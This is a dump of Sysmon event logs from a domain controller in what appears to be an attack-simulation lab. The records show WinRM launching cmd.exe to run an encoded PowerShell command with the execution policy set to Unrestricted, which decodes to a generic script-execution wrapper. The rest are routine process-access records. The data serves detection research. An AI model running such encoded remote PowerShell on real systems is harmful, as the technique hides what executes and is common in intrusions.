UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x800000000000000077Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.075{08A6967A-4258-6000-CA02-000000009901}47364744C:\Windows\system32\conhost.exe{08A6967A-4259-6000-CB02-000000009901}5084C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000076Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.059{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000075Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.059{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000074Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.059{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000073Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.059{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000072Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.059{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000071Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.059{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000070Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.059{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000069Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.059{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000068Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.059{08A6967A-40D2-6000-0500-000000009901}6441160C:\Windows\system32\csrss.exe{08A6967A-4259-6000-CB02-000000009901}5084C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000067Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.059{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000066Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.059{08A6967A-4258-6000-C902-000000009901}19403676C:\Windows\system32\WinrsHost.exe{08A6967A-4259-6000-CB02-000000009901}5084C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x800000000000000065Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.066{08A6967A-4259-6000-CB02-000000009901}5084C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-4258-6000-5FAB-100000000000}0x10ab5f0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4258-6000-C902-000000009901}1940C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x800000000000000064Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.059{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000063Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.059{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000062Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.059{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000061Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.013{08A6967A-40E0-6000-1400-000000009901}13002020C:\Windows\system32\svchost.exe{08A6967A-4258-6000-C902-000000009901}1940C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 